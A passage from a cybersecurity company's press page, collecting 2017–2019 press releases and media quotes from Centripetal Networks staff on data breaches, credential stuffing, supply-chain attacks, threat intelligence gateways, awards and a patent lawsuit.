the New Smart Cybersecurity Tools" "Even as cyber attackers get smarter, and the number and impact of attacks go up, the cybersecurity tools available to data centers are getting better, smarter, and easier to deploy. Machine learning, an AI technique, is already being widely used in cybersecurity to detect previously unknown threats and to spot suspicious traffic patterns and unusual user behaviors." Experts Commented below: Colin Little, Senior Threat Analyst at Centripetal Networks: For example, AI-powered threat intelligence gateways managed as a service are one new option for securing an expanded perimeter, said Colin Little, senior threat analyst at Centripetal Networks. "Organizations are realizing the power of never having enough security analysts," he said. But before deploying any of these new technologies in a live environment, Little recommends that data centers test them thoroughly. "Just like any other new tool!" he said. --- ### [Centripetal Comments in The Security Ledger](https://www.centripetal.ai/company/press/centripetal-comments-security-ledger) Published: 2019-04-25 Summary: Centripetal Comments on Cybercrime Losses From FBI Statistics in The Security Ledger. Organizations lost $2.7 billion to Internet-enabled theft,... Centripetal Comments on Cybercrime Losses From FBI Statistics in The Security Ledger Organizations lost $2.7 billion to Internet-enabled theft, fraud and exploitation in 2018, with business e-mail compromise scams resulting in the highest of these financial losses, according to the FBI’s Internet Crime Complaint Center (IC3). Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: “This is going to be an endless game of cat and mouse,” said Byron Rashed, vice president of marketing, at network cybersecurity firm Centripetal Networks. “One side will gain advantage over the other and then vice versa.” Rashed has a pessimistic view of the average Internet users’s ability to protect against sophisticated and organized cyber crimes. “Although cybersecurity awareness has increased in Internet users, most don’t even know the basics or what to look for to identify threats or possible threats–phishing, basic security in open networks, malware, etc.,” he said. “Many either still don’t have endpoint protection, or they fail to keep it updated against the most current threats.” --- ### [Centripetal comments in Solutions Review](https://www.centripetal.ai/company/press/centripetal-comments-solutions-review) Published: 2019-04-19 Summary: Centripetal Comments on Compromised Chipotle Accounts in Solutions Review article "What Enterprises Can Learn About Credential Stuffing From Chipotle" Centripetal Comments on Compromised Chipotle Accounts in Solutions Review article "What Enterprises Can Learn About Credential Stuffing From Chipotle" Recently, fellow technology publication TechCrunch reported on a potential security event at Chipotle, the Mexican fast-food provider. According to the article, Chipotle application consumers complained of fraudulent charges to their accounts via social media and online forums. Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: “This could be a case of credential stuffing. Many cybercriminals and cyber gangs use algorithmic and other automation to access sites with compromised credentials from other breaches. If it’s true that some victims claim the password is unique to Chipotle, then it’s quite possible they suffered a breach. However, it is also quite possible that the unique passwords associated with their Chipotle accounts could have been derived through password cracking automation by the threat actor since they would have had their email (username).” “Many passwords associate people, places, etc. in one’s life. Threat actors will also leverage a victim’s social media presence to ‘guess’ passwords that can contain a spouse, child or pet’s name that is easy to remember with some basic characters such as ‘dog’s name 123,’ or something similar where automation can produce a myriad of possible passwords.”   --- ### [Centripetal featured in Fox News](https://www.centripetal.ai/company/press/centripetal-featured-fox-news) Published: 2019-04-18 Summary: Centripetal Featured in Fox News Report on "Facebook Now Used for Dark Web Activity". Over two billion people use Facebook to buy and... Centripetal Featured in Fox News Report on "Facebook Now Used for Dark Web Activity" Over two billion people use Facebook to buy and sell goods, chat with each other, and post vacation pictures. Now, according to a new report by Talos Intelligence, it’s also become part of the Dark Web, a place to sell credit card information, illegal contraband, and much more. What’s even more surprising, according to experts, is that this Dark Web activity isn’t that dark or hard to find -- criminals sell credit cards right out in the open. One quick search for a term like “carding” (a criminal term for selling credit cards) reveals dozens of Facebook Groups. Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: "Cybercriminals are fairly brazen due to non-extradition policies and trying to monetize their malicious activities,” said Byron Rashed, a spokesperson for security firm Centripetal Networks. “Many are very good at hiding their location, real identity, and covering their tracks." Facebook told Fox News that it has clamped down against the groups. “These Groups violated our policies against spam and financial fraud and we removed them," explained a spokeswoman, via email. "We know we need to be more vigilant and we're investing heavily to fight this type of activity.” To read more, please see the article on Fox News --- ### [Centripetal Comments on the Toyota Data Breach](https://www.centripetal.ai/company/press/centripetal-comments-toyota-data-breach) Published: 2019-04-12 Summary: Centripetal Comments on the Toyota Data Breach that Exposed Personal Information of 3.1 Million Customers in CPO Magazine Centripetal Comments on the Toyota Data Breach that Exposed Personal Information of 3.1 Million Customers in CPO Magazine According to a Toyota data breach notification, the cyber attack within Japan occurred at eight different Toyota sales subsidiaries or their affiliates, including independent Toyota and Lexus car dealerships located in Tokyo. Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: The start of the automaker’s data breach problems can be traced back to August 30, which is when a Toyota data breach was first detected on the corporation’s email system. At that time, the concern was that an unauthorized third party could have had access to the personal health information (PHI) of 19,000 Toyota employees. According to Byron Rashed, Vice President of Marketing at Centripetal, there are several possible reasons for these sustained attacks: “Breaches occur for many reasons. Compromised credentials, poor patch management, overburdened IT security teams, the shortage of cybersecurity professionals, and the lack of enforcement, or lack thereof of corporate cybersecurity policies. Utilizing a combination of automated tools and HUMINT, organizations can greatly increase their cybersecurity posture and reduce risk.” To read more, please see the article on CPO Magazine --- ### [Centripetal Discusses the Cyberthreat Landscape In DesignNews](https://www.centripetal.ai/company/press/centripetal-discusses-cyberthreat-landscape) Published: 2019-04-12 Summary: In DesignNews, Centripetal Discusses the Cyberthreat Landscape and Why Blocking of Known Malicious Sources is Important to Mitigate Network Infiltration In DesignNews, Centripetal Discusses the Cyberthreat Landscape and Why Blocking of Known Malicious Sources is Important to Mitigate Network Infiltration Cybersecurity company, Tenable Inc., has released the study, Cybersecurity in Operational Technology: 7 Insights You Need to Know. The report was conducted by the Ponemon Institute. The results identify the extent of cyberattacks experienced by critical infrastructure operators — professionals in industries using industrial control systems (ICS) and operational technology (OT). It found that 90% of respondents said their environments had been damaged by at least one cyberattack over the past two years, with 62% experiencing two or more attacks. Experts Commented below: Byron Rashed, VP of Marketing at Centripetal: A cybersecurity expert from Centripetal weighed in on the results of the study. "As noted in the report, attacks continue to be successful due to the lack of cybersecurity teams to keep up with the attack surface,” said Byron Rashed, VP of marketing at Centripetal Networks. “Organizations and various verticals are under constant attack by threat actors and highly organized cybergangs that are looking to monetize their malicious actions. In critical infrastructure, the attacks can be truly devastating. In many cases, the attacks are nation-state driven or inspired. Rashed offered suggestions on how to avoid or deflect cyberattacks. "Cybersecurity teams need to concentrate on the known threats,” said Rashed. “By blocking known adversary nation-states that target critical infrastructure – using geo blocking – as well as inbound and outbound traffic from known malicious sources, an infrastructure organization will greatly increase their cybersecurity posture. Most breaches come from sources that are known to be malicious. Shifting to a blocking strategy will greatly mitigate risk." --- ### [Centripetal Comments in Dark Reading](https://www.centripetal.ai/company/press/centripetal-comments-dark-reading) Published: 2019-04-02 Summary: Centripetal Comments in Dark Reading Article - ShadowHammer Dangers Include Update Avoidance, looking at the compromise of Asus's software update. Centripetal Comments in Dark Reading Article "ShadowHammer Dangers Include Update Avoidance" More fallout from the compromise of Asus's automated software update. Experts Commented below: Colin Little, Senior Threat Analyst at Centripetal: The ShadowHammer attackers used a trusted supplier — which itself was using trusted certificates for authentication — to target a relatively small number of end users. But the impact of the attack may be felt far beyond the targeted systems as customers around the world lose confidence in the software, firmware, updates, and patches provided by Asus. "We plainly see the need for validation of trusted-vendor channels in addition to digital signatures — which, in this case, appears to have further concealed the malicious activity by providing a false sense of integrity — not just for software and platform updates, but any 'trusted' vendor network which has access into our environment," says Colin Little, senior threat analyst at Centripetal. --- ### [Centripetal Comments on Email Breach in Solutions Review](https://www.centripetal.ai/company/press/centripetal-solutions-review-email-breach) Published: 2019-03-30 Summary: Centripetal Comments on Massive Email Breach in Solutions Review. Byron Rashed, VP of Marketing of Centripetal Networks: Centripetal Comments on Massive Email Breach in Solutions Review In what some experts call one of the most largest and comprehensive email breaches of all time, nearly one billion emails have been exposed by a little-known marketing company called Verifications.io. Experts Commented below: Byron Rashed, VP of Marketing of Centripetal Networks: "Businesses and consumers should always verify and deal with trusted businesses. In today’s digital environment, giving electronic information out about one’s self is exposing the individual to a variety of cyber crimes. Credentials can be leveraged by a threat actor for identity theft on a personal level and corporate network infiltration and data exfiltration for businesses. Enterprises should enabling blocking of such malicious sources, which is key to preventing network infiltration and reducing and mitigating the risk of data exfiltration. Corporate policy should govern and prevent the use of their corporate credentials on non-work related sites as well. Education of employees is always the best first line of defense, since most breaches are caused by human error.” To read more, please see the article on Solutions Review --- ### [Centripetal's CEO Featured in SC Magazine](https://www.centripetal.ai/company/press/centripetal-featured-sc-magazine) Published: 2019-03-28 Summary: Centripetal's CEO Steven Rogers Featured in SC Magazine's Article on the GAO's Cybersecurity Findings Within the Bureau of Fiscal Service. Centripetal's CEO Steven Rogers Featured in SC Magazine's Article on the GAO's Cybersecurity Findings Within the Bureau of Fiscal Service The General Accounting Office (GAO) criticized the Bureau of the Fiscal Service, which is part of the U.S. Department of the Treasury, over new and old cybersecurity problems in a new audit. Experts Commented below: Steven Rogers, CEO of Centripetal: “It’s great that an audit found this key vulnerability. However, well-designed network security systems should already employ both internal and external protective technologies to prevent successful attackers from stealing data. These new protective systems, such as Threat Intelligence Gateways, can protect the enterprise from yet unknown vulnerabilities, long before an audit finally discovers them,” Steven Rogers, CEO of Centripetal. Rogers added that all the systems should employ advanced intelligence in their security stacks such as external threat intelligence-based and internal rule-based systems that will detect an issue before it is exposed. “They shouldn’t wait for a vulnerability to be exposed before doing anything.  With the aforementioned technologies in place, the practical effect of a vulnerability would be mitigated. The agency should still find and fix potential vulnerabilities, but if these protective systems are in place, the attacker will be stopped anyway,” Rogers said. To read more, please see the article on SC Magazine --- ### [Centripetal Contributes to DarkReading](https://www.centripetal.ai/company/press/centripetal-darkreading-asus) Published: 2019-03-27 Summary: Centripetal Contributes to DarkReading on ASUS 'ShadowHammer' Attack against ASUS notebook customers. Centripetal Contributes to DarkReading on ASUS 'ShadowHammer' Attack In response to 'ShadowHammer' attack against ASUS notebook customers.   Experts Commented below: Colin Little, Senior Threat Analyst at Centripetal Networks: To mitigate risk from software updates, verify that the file you are installing is the file that the vendor intended, says Colin Little, senior threat analyst at Centripetal Networks. "A lot of popular software development companies will post the expected file hash of the package," when making the update available for download, he says. The goal is to give recipients a way to verify that the file hash of the file they downloaded is the same as the expected value. Any change in the package would change the hash value. To read more, please see the article on DarkReading --- ### [Centripetal Featured in SC Magazine](https://www.centripetal.ai/company/press/centripetal-sc-magazine-malicious-sources) Published: 2019-03-20 Summary: Centripetal Featured in SC Magazine! Why it's Important to Block Malicious Sources to Prevent Network Infiltration and Data Exfiltration. In response.. Centripetal Featured in SC Magazine! Why it's Important to Block Malicious Sources to Prevent Network Infiltration and Data Exfiltration In response to hacker (Gnosticplayers) releasing 26Mil user records for sale on the Dark Web - most of which were obtained by hacking companies last month.   Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: “This is a classic example of a highly skilled and motivated threat actor that has successfully infiltrated networks and exfiltrated high value data for sale in the underground economy. There are actually two issues. The first is organizations that fail to block or identify malicious IPs and domains. Network infiltration can be greatly mitigated by blocking these malicious sources. The second is the failure to protect data with strong encryption. Data not encrypted or weakly encrypted enables the threat actor to fully monetize the caches he is selling, making it highly profitable and more attractive to potential buyers.” To read more, please see the article on SC magazine. --- ### [Information Warfare a Top Cyber Threat in 2019](https://www.centripetal.ai/company/press/information-warfare-cyber-threat-2019) Published: 2019-02-12 Summary: A report found that the top cyber threat to organizations is that they may find themselves caught in the cross hairs of information warfare. Predicting threats that are yet to come is always tricky, but a new report published by Booz Allen, 2019 Cyberthreat Outlook, identifies eight key cyber threats to watch as the year advances. In addition to combing through thousands of intelligence reports from commercial clients, researchers also sought feedback from analysts. Attempting to identify the top challenges organizations are likely to face this year, the report found that the top threat to organizations is that they may find themselves caught in the cross hairs of information warfare. “This activity encompasses a wide range of tactics, from orchestrating targeted breaches followed by data leaks to employing troll armies to push disinformation. So far, states have mainly used these capabilities for political and military purposes, like nudging voters and enflaming cultural conflict,” the report said. “Booz Allen believes in 2019, states will increasingly use their growing information-warfare methods applied to economic conflict and will likely aim to generate investor, regulatory, consumer, or political backlash against targeted sectors and companies by fabricating or inflaming public relations and legal controversies.” Social Media's Misinformation Certainly social media has created a pathway for companies to get caught in a misinformation web. “Increasingly, nation-states and other entities use the power of social media to support information warfare campaigns,” said Pravin Kothari, CEO, CipherCloud. “Social media can be deployed as a cannon of misinformation to damage corporate reputations, attack government institutions and their policies, attack individual politicians and organizations, and in general obfuscate the truth and confuse the public.” Though the additional key threats are legitimate concerns to both governments and businesses, some threats – especially the lack of security in many IoT devices and connected cars – do apply to consumers, according to Byron Rashed, vice president of marketing at Centripetal Networks. "Combating these threats is difficult, especially cyber-threats from nation-states that have no budgetary limits. Keeping IT assets (security and infrastructure) up to date with the latest versions of software and patches will help to curb some threats that may find their way into the network,” Rashed said. Re-posted from: https://www.infosecurity-magazine.com/news/information-warfare-a-top-cyber/ --- ### [New Google Chrome “Password Checkup” Feature](https://www.centripetal.ai/company/press/google-chrome-password-feature-isbuzz) Published: 2019-02-12 Summary: Centripetal discusses the new Google Chrome “Password Checkup” Feature in information security buzz. Byron Rashed, VP of Marketing at Centripetal Networks: “Compromised credentials are the basis for a threat actor to perform network infiltration, data exfiltration, spoofing, account takeover, stolen PII, and various other malicious activities that can create huge risks for businesses and individuals. Most Internet users (consumers) do not have even a basic knowledge of what a compromised credential is, or the ramifications of having their credentials stolen. “Most likely Google is obtaining these credentials from dumps that are readily available and most likely have been for sale or trade in the underground economy. The real challenge of mitigating risk with regard to compromised credentials is to obtain the list from the threat actor before it is available for sale or on dump sites that are public. Most compromised credential sites only deliver those credentials that are already available. However, there is value into that since the credential may not be leveraged by cybercriminals…yet, and the user most likely has no knowledge of this since most are unaware of compromised credentials and where to find them. Google is using Chrome, which is used ubiquitously by their users to deliver this warning. “Privacy is an issue, these credentials must be stored somewhere and transmitted to the browser. Any time credentials or PII are stored, it will create a target for cybercriminals that have very complex tools to extract them. The security of these credential that Google has I’m sure will be tested since it’s “password compromised-based,” not the username, meaning the compromised password for that site is still using the compromised credential.” To read more please visit information security buzz. --- ### [59K Breaches Reported But Only 91 Fines Imposed Since GDPR](https://www.centripetal.ai/company/press/data-breaches-gdpr-isbuzz) Published: 2019-02-12 Summary: Before GDPR, it may not have been reputationally feasible to report data breaches. However, with GDPR, it’s mandatory. In response to the new 2018 breach report from cybersecurity watchdogs with DLA Piper that European companies experience 60,000 data breaches in last 8 months. Experts Commented below: Byron Rashed, VP of Marketing at Centripetal Networks: “It’s no surprise the amount of data breaches that are now reported. Before GDPR, it may not have been reputationally feasible to report data breaches. However, with GDPR, it’s mandatory. Whenever a regulation is enacted, it requires a large amount of internal and external resources as well as capital investment to ensure compliance. Many organizations in the EU were not investing in the proper cybersecurity practices. “In many cases where compliance is a factor, the cost of fines would have to outweigh the capital investment needed to ensure compliance. An organization can spend several hundred thousand Euros to prepare and maintain compliance. If the fine is only 10,000 Euros, it’s actually cost beneficial to take the fine and remediate the breach. “The bottom line here is that many organizations were not prepared for GDPR and fell short in compliance.” To read more, please visit information security buzz --- ### [Centripetal Comments on Mobile Chrome Hoax](https://www.centripetal.ai/company/press/centripetal-mobile-chrome-hoax) Published: 2019-02-06 Summary: Centripetal Comments on "Mobile Chrome Hoax Could Target Android Users" in TechNewsWorld. A new method for hiding the true location of a... Centripetal Comments on "Mobile Chrome Hoax Could Target Android Users" in TechNewsWorld "A new method for hiding the true location of a website from users of the mobile Chrome Web browser has come to light. Scammers can exploit mobile Chrome's feature that hides the address bar when users are scrolling on a Web page by inserting an address bar that allows a fake site to pose as a legitimate one, such as that of a bank..." Experts Commented below: Jonathan Olivera, Threat Analyst at Centripetal Networks: Phishing attacks on mobile devices likely are on the rise due to the rapid growth in the sector, explained Jonathan Olivera, a threat analyst with Centripetal Networks, a cybersecurity solutions provider in Herdon, Virginia. "The bad actors will always follow the areas that have the most users," he told TechNewsWorld. "The mobile platforms and application developers have an incentive to produce as many products as feasible to satisfy their user base," Olivera said, "which results in security vulnerabilities in many of them." To read more, please see the article on ECTNews. --- ### [ESG Validates Centripetal’s Unparalleled Performance](https://www.centripetal.ai/company/press/esg-validates-centripetal) Published: 2018-08-14 Independent analysis validates Centripetal’s solutions: “This is the highest performance network filtering solution that ESG has tested or seen in action to date,” said Tony Palmer, ESG Senior Validation Analyst. HERNDON, Va., August 14th, 2018 -- Centripetal, the leading provider of RuleGATE® threat intelligence gateways and CleanINTERNET® service, announces the results of a validation report which studied the technologies that enterprises need in order to realize the promise of cyber threat intelligence.  The analysis, written by The Enterprise Strategy Group (ESG), illustrates the necessity to deploy threat intelligence gateway technologies in order to implement a true, before-the-event, intelligence process. With these solutions, security teams can now harness the work-product of thousands of global security analysts. ESG’s validation provides an overview of each of the technology challenges that must be overcome to move beyond a forensic posture and to realize a best-in-class threat intelligence defense. The report explains how Centripetal operates at every phase of the intelligence cycle to solve these highly specialized problems. “Organizations have been led to believe that they can get what a threat intelligence gateway does from a firewall. The stark reality is that the volume and specialization of threat intelligence calls for specialized tools. Simply put, with the ability to process hundreds of millions of indicators from thousands of feeds, Centripetal delivers more than is possible with firewalls and IPS systems,” said Tony Palmer, Senior Validation Analyst with ESG. Enterprise security teams are recognizing that the real value of threat intelligence doesn’t come from raw reports or forensic analysis. Intelligence is supposed to be about prevention. “What matters with CTI risk is not in the data itself - it’s whether or not the threat actually comes to your door. Network presence is what really matters, and this is why CTI gateway technology is so important,” said Jon Oltsik of ESG. Taking proactive and defensive action to stop malicious threats and cut event workload in advance is the true value of threat intelligence. “Centripetal’s security service solves all of the critical needs highlighted by ESG, allowing our customers to deploy a compelling solution that acts in advance,” said Steven Rogers, Centripetal’s CEO.  “Centripetal’s CleanINTERNET® service combines automated intelligence, the company’s RuleGATE® automated enforcement points, and real-time analytics to help protect organizations of any size.” About Centripetal Centripetal delivers intelligence-driven security. Centripetal invented the Threat Intelligence Gateway and leverages its technologies to deliver CleanINTERNET, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with intelligence applied in advance. Gartner, Inc. has named Centripetal a "Cool Vendor" in security for 2017, and the Security Innovation Network (SINET) named Centripetal a “SINET-16” awardee. Centripetal’s technology is protected by over 50 US and international patents. --- ### [Centripetal Announces Network Filter Technology Breakthrough](https://www.centripetal.ai/company/press/network-filter-technology-breakthrough) Published: 2018-02-21 RuleGATE®, the world’s highest performance network filter, can now be deployed anywhere as a software solution. HERNDON, Va., February 21, 2018 /PRNewswire/ -- Centripetal Networks, the leading provider of real-time network defense solutions, announced today the release of its next-generation RuleGATE® network filter, which can now be deployed entirely in software. RuleGATE was originally developed to operate in the most extreme high-performance datacenters and carrier networks, and required dense, multi-core architectures. But today, after several years in development, Centripetal’s R&D team has achieved another remarkable breakthrough in filter performance. Thanks to its patented algorithms and purpose-built hardware, RuleGATE can now filter traffic against threat intelligence at unprecedented rates, including on commodity processors, virtual machines, and public cloud infrastructure — and without affecting user experience. Instead of multi-core processors, the RuleGATE system is now fully supported in software and on standard processors. Enforcement points can be deployed either on-premise or in the cloud. Perhaps most important, businesses of all sizes can now take advantage of RuleGATE’s unparalleled threat intelligence capabilities. “We transformed the networking and security industry when we first released our datacenter RuleGATE products” said Dr. Sean Moore, Centripetal’s CTO. “Even today, RuleGATE’s cyber-decision rates are unmatched.  Now we can do entirely in software what our competitors still cannot do using inflexible hardware ASICs and FPGAs.” Today’s cyber threats increasingly drive security teams to augment their security posture with expert-managed security services such as Centripetal’s CleanINTERNET® service. “This is a breakthrough for customers”, said Steven Rogers, Centripetal’s CEO. “Now our CleanINTERNET clients can realize the benefits of an intelligence defense anywhere, on any virtual or physical link, and at a very reasonable cost.” Centripetal’s filter systems proactively defend enterprise networks against cyber attackers by leveraging an intelligence-led defense. Centripetal’s systems and services are tailored to every type of enterprise environment in order to protect Internet connections from 100Mb to 100Gb speeds — at a range and level of performance that no other system can achieve. About Centripetal Centripetal is dedicated to protecting organizations from advanced threats by operationalizing intelligence-driven security. Centripetal delivers the market’s only patented Threat Intelligence Gateway to customers via its CleanINTERNET solution, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with applied intelligence, rapid correlation, and automated enforcement of millions of IOCs against live network traffic with live cyber analyst support.   Gartner, Inc. has named Centripetal a "Cool Vendor" in security for 2017, and the Security Innovation Network (SINET) named Centripetal a “SINET-16” awardee. Centripetal’s technology is protected by over 40 US and international patents. --- ### [Centripetal Named SINET 16 Innovator for 2017](https://www.centripetal.ai/company/press/centripetal-named-sinet-16-innovator) Published: 2017-10-31 Summary: Centripetal Networks announced it has been recognized as a SINET 16 Innovator winner for 2017. #SINET16 Herndon, VA. – October 31, 2017 – Centripetal Networks, the first company in the cybersecurity market to fully operationalize and automate threat intelligence at scale, today announced it has been recognized as a SINET 16 Innovator winner for 2017. #SINET16 SINET receives hundreds of applications every year for this prestigious award from innovative companies worldwide, but only the top 16 most innovative companies are named winners by the SINET Steering Committee of over 100 industry experts. Centripetal’s CEO Steven Rogers will present on behalf of Centripetal on November 9th, joining all 2017 winners at the SINET Showcase in Washington D.C. All companies presenting will have a chance to secure a capital investment of up to $100,000 from SixThirty CYBER, a business development venture fund. “We’re honored to receive this distinguished recognition by SINET this year,” said Steven Rogers, CEO, Centripetal. “We know the selection process is complicated, and the criteria is stringent. However, we are thrilled SINET sees the true innovation in what Centripetal is bringing to market by way of operationalizing threat intelligence for any size company for real-time, intelligence-led protection.” Security teams aren’t just overwhelmed by the rapidly expanding threat surface they face – they have too many legacy tools focused on signature-based detection, and they can’t apply enough threat intelligence to live inbound or outbound traffic to turn intelligence into action. The industry has acknowledged this challenge in the SOC, and Centripetal is solving this problem in delivering the one true threat intelligence gateway to the market at-large. Its CleanINTERNET intelligence-led service is helping teams filter bad traffic and prevent threats with intelligence by applying upwards of 7 million complex IOC rules across 70+ sources and 3,000 unique feeds. “Congratulations to Centripetal for being selected as a SINET 16 Innovator,” said Robert D. Rodriguez, Chairman of SINET. “Every year the competition continues to be more competitive than previous years and we are excited to announce that Centripetal will have an opportunity to present on stage at the SINET Showcase. SINET believes that one of the best ways to advance innovation is to increase awareness that technologies exist to better society.” About SINET SINET is a “Super-Connector” that accelerates Cybersecurity innovation into the global marketplace by providing trusted platforms for the business of Cyber to take place between; investors, entrepreneurs, large corporations and industry and government buyers. SINET events, sponsorship and membership opportunities have delivered unsurpassed value within the ecosystem of the entrepreneur; academia, science, private industry, investment banking, system integration, policy, innovators, venture capital and the Federal Government to include the civilian, military and intelligence agencies. Our forums take place in Silicon Valley, Vail, New York, Sydney, London, Scottsdale and Washington DC. www.security-innovation.org About Centripetal Networks Centripetal Networks Inc. is dedicated to protecting organizations from advanced threats by operationalizing intelligence-driven security. Centripetal delivers the market’s only patented Threat Intelligence Gateway platform to customers via its CleanINTERNET solution, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with applied threat intelligence, rapid correlation and automated enforcement of millions of IOC policies against live network traffic with live cyber analyst support. --- ### [Centripetal Selects Webroot BrightCloud® IP Reputation Service](https://www.centripetal.ai/company/press/centripetal-webroot-ip-reputation) Published: 2017-10-18 Summary: By utilizing Webroot’s BrightCloud® IP Reputation Service, Centripetal can update its real-time threat intelligence feed every few minutes. BROOMFIELD, Colo. – October 17, 2017 –  Webroot, a leader in endpoint security, network security, and threat intelligence, announced its partnership with Centripetal Networks, the first company in the cybersecurity market to operationalize and automate threat intelligence at scale. By utilizing Webroot’s BrightCloud® IP Reputation Service, Centripetal Networks can dynamically update its real-time, correlated threat intelligence feed every few minutes to drastically reduce the time of threat detection and intelligence-powered prevention. About the Partnership: Integration of Webroot BrightCloud IP Reputation Service allows Centripetal Networks customers to have the latest and most critical data to apply to their overall threat prevention strategy. By improving the efficacy of Centripetal Network’s CleanINTERNET intelligence-led service, Webroot BrightCloud IP enhances Centripetal’s ability to protect customers from malicious URLs, IPs, and files so that customers are able to dramatically reduce the time required to identify IP threats. Centripetal enhances customers’ ability to perform more comprehensive threat detection and blocking than any traditional network security solution. Centripetal’s CleanINTERNET service is built on its revolutionary threat intelligence gateway technology. Centripetal correlates the largest number of third-party threat intelligence service integrations within the broader cybersecurity market today. About Webroot BrightCloud IP Reputation Service: Webroot BrightCloud IP Reputation Service helps network and security vendors augment their customers’ security by adding a dynamic IP reputation service to their defenses. It integrates with most existing security solutions, simplifying the offering of multiple services. The full database of malicious IPs is downloaded to the device with a recommended update every five minutes. Webroot provides partners with a continuously updated feed of known malicious IP addresses, broken down into 11 categories so IT security administrators can easily identify threats by type and protect their networks. These categories are: Windows Exploits, Web Attacks, Phishing, Botnets, Denial of Service, Scanners, TOR Proxies, Anonymous Proxies, Reputation, Spam Sources, and Mobile Threats. The BrightCloud IP Reputation service is powered by the Webroot BrightCloud Threat Intelligence Platform, which uses a big data architecture and highly advanced machine learning to provide the most comprehensive and accurate threat intelligence available today, including up-to-the-minute intelligence to identify emerging IP threats out of the billions of IPv4 addresses and active IPv6. Key Quotes: Hal Lonas, Chief Technology Officer, Webroot “On any given day, more than 100,000 IPs are used to conduct malicious activity, making it extremely difficult for administrators to know which IPs to block. Further complicating matters, many publicly available IP block lists are static and outdated. Webroot BrightCloud IP Reputation Service tackles this issue head-on by utilizing up-to-the-minute IP intelligence capabilities, stopping IP threats before they can cause damage. We are excited to bring this service to Centripetal Network’s top-class threat intelligence platform, which has already proven to be an excellent service in protecting against cyber-attacks.” Steven Rogers, Chief Executive Officer, Centripetal Networks “With the evolution and scale of today’s cyber-attacks, security professionals simply cannot apply threat intelligence and take action at scale. They need a solution that can process millions of complex threat indicators in real time to ensure their businesses are protected. By partnering with Webroot, we can give our customers access to one of the largest sources of threat intelligence. This combination provides protection against 8 to 12 million malicious IPs at any given time." Centripetal and Webroot are partnering to deliver an informational webinar to demonstrate its integrated capabilities on November 7, 2017 at 2 p.m. EST. Register here. Additional Resources: Click here for more on Centripetal Networks' CleanINTERNET solution. Click here to see the latest Webroot Quarterly Threat Trends report Click here for more on Webroot BrightCloud IP Reputation Service. --- ### [Centripetal Previews AI-Analyst™ in First Public Demonstration](https://www.centripetal.ai/company/press/centripetal-previews-ai-analyst) Published: 2017-08-14 Summary: The system, called “AI-Analyst”, was demonstrated live at the 2017 Cyber Security R&D Showcase in Washington DC. Provides first look at breakthrough Artificial Intelligence-based cyber technology Herndon, VA. – August 14, 2017 – Centripetal Networks, the first company in the cybersecurity market to operationalize and automate threat intelligence at scale, today announced the first public demonstration of its upcoming Artificial Intelligence (AI)–based cyber analysis system. The system, called “AI-Analyst”, was demonstrated live at the 2017 Cyber Security R&D Showcase in Washington DC. The recent showcase was hosted by the Department of Homeland Security (DHS) and is the Federal government’s premiere cyber security R&D event. The demonstration was given at the request of the DHS to provide the cyber industry a preview of this advanced capability. Centripetal Networks has a contract with the DHS to accelerate the availability and deployment of the Centripetal AI-Analyst system for use by government and industry customers. As a part of this DHS project, Centripetal is integrating the AI-Analyst system with its existing CleanINTERNET® Intelligence-led Cyber Service. CleanINTERNET, powered by Centripetal’s market-leading Threat Intelligence Gateway technology, is already changing enterprise cyber defense by providing a dramatic increase in cyber protection, as well as a security cost reduction. The advanced functionality of the AI-Analyst initiative adds machine learning, extensive operational event data, and expert heuristic algorithms to automate threat event analysis. AI-Analyst directly addresses three (3) distinct issues that place a significant strain on cybersecurity practitioners today: Automatic critical threat identification: The real-time identification of serious reportable attacks is often hidden in a flood of security events. Event analysis currently requires an enormous commitment of cyber analyst man-hours to manually investigate threats. Cyber security talent shortage: The industry faces an extreme shortage of cyber analysts. This has been identified by many as the single most critical problem in the cyber industry. Shorter time-to-resolution: To limit or prevent damage, cyber analysts must immediately and accurately identify cyber issues and then resolve them. AI technology can dramatically reduce and eliminate the current cyber workload, the time to remediate or even automatically stop attacks. “The cyber security community simply must provide cyber analysts with much better tools for doing their jobs more effectively and efficiently,” said Dr. Sean Moore, the chief technology officer and AI-Analyst principal investigator, Centripetal Networks. “The goal of our AI-Analyst integration program is to deliver at least a 100X improvement in cyber analysts’ productivity with at least a 10X reduction in cost.” About Centripetal Networks Centripetal Networks Inc. is dedicated to protecting organizations from advanced threats by operationalizing intelligence-driven security. Centripetal delivers the market’s only patented Threat Intelligence Gateway platform to customers so they can persistently prevent up to 90% of known threats with rapid correlation capabilities, and automated enforcement of millions of IOC policies. Centripetal’s CleanINTERNET, an intelligence-led cyber service, leverages these distinct advantages to protect companies of any size. Centripetal is headquartered in Herndon, VA. --- ### [Centripetal Files Patent Infringement Complaints](https://www.centripetal.ai/company/press/patent-infringement-complaint-keysight-technologies-ixia) Published: 2017-07-31 Summary: Centripetal Files Patent Infringement Complaint Against Keysight Technologies and Ixia, and is Committed to Protecting Its Innovations. Centripetal Networks Files Patent Infringement Complaint Against Keysight Technologies and Ixia Centripetal Networks Is Committed to Protecting Its Groundbreaking Innovations Herndon, VA. – July 31, 2017 – Centripetal Networks, the first company in the cybersecurity market to fully operationalize and automate threat intelligence through its Threat Intelligence Gateway platform, today announced that it has filed a complaint against Keysight Technologies, Inc. (NYSE: KEYS) and Ixia in the United States District Court for the Eastern District of Virginia, Alexandria Division. The complaint asserts that Keysight and Ixia’s ThreatARMOR, Vision ONE, and Application and Threat Intelligence products and services are infringing at-least four key patents owned by Centripetal Networks. These patents generally relate to protecting networks by quickly identifying new network security threats, identifying compromised hosts, and dynamically managing massively scaled network security policies. “Centripetal Networks prides itself on creating new technology that is on the leading edge of industry innovation with our proprietary network security hardware and software”, said Steven Rogers, CEO of Centripetal Networks. “We founded Centripetal Networks to bring to life these fundamental advancements and our wide-ranging patent portfolio demonstrates our commitment to protecting those innovations.” Mr. Rogers continued, “We filed this lawsuit only after it became clear that Keysight and Ixia were using the technological advantages enabled by our intellectual property to enter the network security market and develop their own competing products. We owe it to our scientists and engineers to vigorously defend our valuable portfolio of patents against these infringements.” Centripetal Networks 